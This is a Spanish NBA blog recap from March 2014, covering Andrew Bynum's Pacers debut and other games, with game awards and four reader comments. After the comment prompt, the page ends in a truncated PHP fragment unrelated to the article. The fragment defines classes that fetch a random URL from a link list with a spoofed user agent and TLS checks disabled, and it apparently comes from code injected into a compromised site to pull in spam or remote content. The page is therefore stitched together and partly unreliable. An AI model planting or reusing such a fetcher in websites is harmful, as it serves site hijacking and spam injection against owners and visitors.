La Crónica: Bynum returns

12 de March de 2014 por TheDeerHunter

Notable debut de Andrew Bynum con unos Pacers a los que se les está haciendo eterna la regular. De hecho, el ex de Lakers y Cavs estuvo bastante mejor que el titular Roy Hibbert a quien le observamos un importante bache de juego casi desde el inicio del 2014. Bynum, con sus únicos 16 minutos en pista, fue clave en la victoria ante los Celtics reimpulsando a un banquillo que se había quedado demasiado apagado tras la salida de Danny Granger. Por los verdes excesivo desacierto en el tiro que evitó males mayores a los líderes de conferencia (83-94).

En el Oeste la batalla sigue tan encarnizada como durante todo el curso. Los Spurs se mostraron intratables ante Bulls a pesar de no contar con un Duncan particularmente brillante y de no obtener producción de dos titulares como Splitter y Green. El banco, en cambio, funcionó a la perfección con 10 de 17 en triples y casi un 60% en tiro, para un total de 64 puntos producidos por 8 hombres. Los Bulls trataron de enfrentar ese factor con un gran DJ Augustin, que junto a Butler y algo de Noah fueron los que propusieron algo de oposición al chaparrón tejano (104-96). 7ª victoria consecutiva de los líderes del Oeste.

Los Thunder esta vez aguantaron el envite a pesar de no tenerlo nada fácil ante los ockets. Al habitual gran partido del tridente Westbrook-Durant-Ibaka se unió la mejor actuación de Caron Butler desde que llegó al equipo. Los Rockets se estancaron en la primera parte con un flojo partido de Howard y Beverley y sus rivales administraron la ventaja con tranquilidad (98-106). En la parte baja del cuadro los Grizzlies dieron un paso de gigante ganando en Memphis a los Blazers. Nuevo partidazo de Zach y Marc, éste último rozando triple doble, y excelente desempeño general del equipo ante unos Blazers desinflados que están tirando por la borda todo lo bueno que hicieron al principio de temporada (99-109). Los Warriors ya pisan los talones a los de Oregon tras destrozar anoche a los Mavs gracias, oh sorpresa, al banquillo. La segunda unidad, encabezada por Jordan Crawford, Steve Blake y Harrison Barnes marcó la diferencia en un partido gris de los titulares y con Curry tocado (85-108).

Para finalizar el repaso, los Wolves ganaron a Milwaukee (101-112) y los Pistons a Sacramento (89-99) en los partidos intrascendentes del día. 

PREMIOS

MVP: Otro partido con Kevin Durant anotando más de 40 puntos. Esta vez fueron 42 que adornó con 5 rebotes y 4 asistencias.

Rookie: Impresionante Nick Calathes. En apenas 19 minutos anotó 7 puntos y repartió 9 asistencias.

Sorpresa: Como comentábamos en el inicio de la crónica, buen debut de Andrew Bynum con los Pacers. Acabó con 8 puntos y 10 rebotes en apenas 16 minutos. Rodney Stuckey apareció de no se sabe muy bien donde para anotar 23 puntos. JJ Barea llegó a los19 en 28 minutos con un impropio (para él) 7 de 10 en tiros.

Decepción: Triste partido de Dwight Howard y eso que no tuvo que sufrir a Kendrick Perkins. Acabó solo con 9 puntos con un 4 de 12 en TC. Shawn Marion se quedó sin anotar tras fallar los 6 intentos de canasta.

Esfuerzo en vano: James Harden puso de parte ante sus antiguos compañeros pero sus 28 puntos, 8 rebotes, 9 asistencias fueron insuficientes para llevarse la victoria.

Imágenes | AP Photos / Getty Images

Comenta

4 comentarios a esta entrada

  1. Esteban dice:
    #1

    Los blazers se desinflan y los warriors empiezan a dar miedo, esto le da un plus al tercer puesto del oeste,

    clippers o rockets, creo yo que por lejos preferirian enfrentarse a portland que a la artilleria de los warriors

      Citar

  2. HisRoyalAirness dice:
    #2

    Bynum sano es el mejor center de la liga de largo. No va a estarlo pero en 15 minutos es una absoluta pesadilla para el rival.
    Por mucho que se estén desinflando no veo quién puede pararlos en una serie

      Citar

  3. Ruxixon dice:
    #3

    Beverley – Westbrook,el amor es para siempre.Se la tenía guardada el base de los Thunder de los pasados PO,cuando en una acción desafortunuda Beverley tocó la rodilla de Westbrook para provocarle esa lesión de menisco,cuando éste se dirigía al banquillo pidiendo tiempo muerto.Esta noche se repitió la misma acción aunque afortunadamente no con el mismo resultado.Desde ese momento muchos piques derivando en un Beverley descentrado,de ahí ese pobre rendimiento.

      Citar

  4. oli dice:
    #4

    A los rockets les dais alguna opción contra thunder o spurs?? estan haciendo una buena campaña pero lo poco que les he visto no me acaban de dar confianza para playoffs. Primera ronda contra los blazers o los warriors tienen opciones y más con campo a favor si acabara como esta ahora la clasificación, pero que pasen semis de conferencia yo no lo veo.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>